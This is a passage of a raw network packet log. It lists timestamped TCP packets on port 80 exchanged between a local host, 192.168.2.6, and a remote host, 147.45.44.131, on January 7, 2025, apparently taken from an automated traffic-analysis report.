                                                                          Jan 7, 2025 06:12:05.503880024 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503889084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503894091 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503894091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503901005 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503927946 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503969908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503981113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503992081 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504008055 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.504010916 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504026890 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504029989 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.504038095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504048109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504057884 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504060984 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.504069090 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504079103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.504082918 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.504097939 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.543014050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.543047905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.543065071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.543076038 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.543086052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.543088913 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.543097019 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.543108940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.543116093 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.543162107 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590059042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590102911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590120077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590137959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590143919 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590154886 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590167046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590178013 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590187073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590192080 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590198994 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590214968 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590234041 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590296030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590306997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590317965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590328932 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590337038 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590353012 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590409040 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590420008 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590430021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590440989 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590441942 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590451956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590461016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590471029 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590471029 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590492964 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590504885 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590508938 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590522051 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590538979 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590543032 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590562105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590573072 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590574026 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590584993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590595007 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590606928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.590610981 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.590637922 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.593790054 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593801022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593826056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593841076 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.593875885 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.593909979 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593924046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593934059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593955040 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.593955994 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593969107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593978882 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.593991995 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.593996048 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594007969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594017029 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594021082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594041109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594053984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594062090 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594086885 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594091892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594101906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594111919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594121933 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594134092 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594149113 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594280958 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594291925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594301939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594312906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594322920 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594325066 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594332933 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594343901 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594355106 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594378948 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594439030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594455957 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594474077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594492912 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594505072 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594515085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594533920 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594544888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594556093 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594566107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594574928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594578981 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594587088 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594592094 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594598055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594609022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594618082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.594624043 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.594640970 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595556021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595590115 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595594883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595613003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595623970 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595647097 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595681906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595691919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595721960 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595721960 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595742941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595752001 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595760107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595762968 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595771074 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595788956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595788956 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595801115 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595812082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595822096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595838070 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595868111 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595868111 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595884085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595895052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595904112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595915079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.595918894 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595942020 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.595958948 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596055984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596067905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596091986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596096039 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596102953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596113920 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596132994 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596143961 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596151114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596160889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596170902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596174002 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596182108 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596194029 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596200943 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596209049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596219063 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596220016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596231937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596240044 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596241951 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596270084 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596281052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596291065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596307993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596317053 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596329927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596337080 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596340895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596350908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596369982 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596446037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596457005 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596466064 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596477032 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.596487999 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.596514940 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.635433912 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635452986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635467052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635479927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635489941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635495901 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.635531902 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.635540009 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635551929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635562897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635571003 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.635575056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.635591984 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.635608912 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682300091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682346106 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682358027 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682383060 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682394981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682404995 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682408094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682426929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682441950 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682446003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682456970 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682496071 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682638884 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682657003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682667971 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682691097 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682708025 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682713032 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682718992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682729959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682733059 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682742119 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682754993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682758093 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682765961 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682776928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682787895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682792902 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682799101 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682816982 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682818890 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682830095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682840109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682842016 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682842016 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682853937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682866096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682873011 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682877064 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682888031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682898998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.682902098 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.682924032 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686074972 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686085939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686124086 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686127901 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686167002 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686187029 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686198950 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686218023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686228037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686233997 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686238050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686249971 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686273098 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686276913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686296940 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686327934 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686340094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686351061 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686372995 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686376095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686388969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686405897 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686422110 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686446905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686458111 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686469078 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686491966 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686500072 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686502934 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686515093 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686523914 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686572075 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686680079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686691046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686701059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686711073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686721087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686728954 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686737061 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686753035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686754942 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686764002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686774969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686774969 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686784983 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686796904 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686800003 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686815023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686824083 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686827898 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686840057 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686851978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686858892 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686861992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686876059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.686883926 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.686908007 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.687818050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.687839031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.687849998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.687885046 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.687899113 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.687935114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.687947035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.687958956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.687972069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.687978983 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688019037 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688031912 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688055992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688074112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688082933 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688092947 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688098907 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688106060 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688118935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688128948 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688129902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688152075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688163042 CET4971280192.168.2.6147.45.44.131
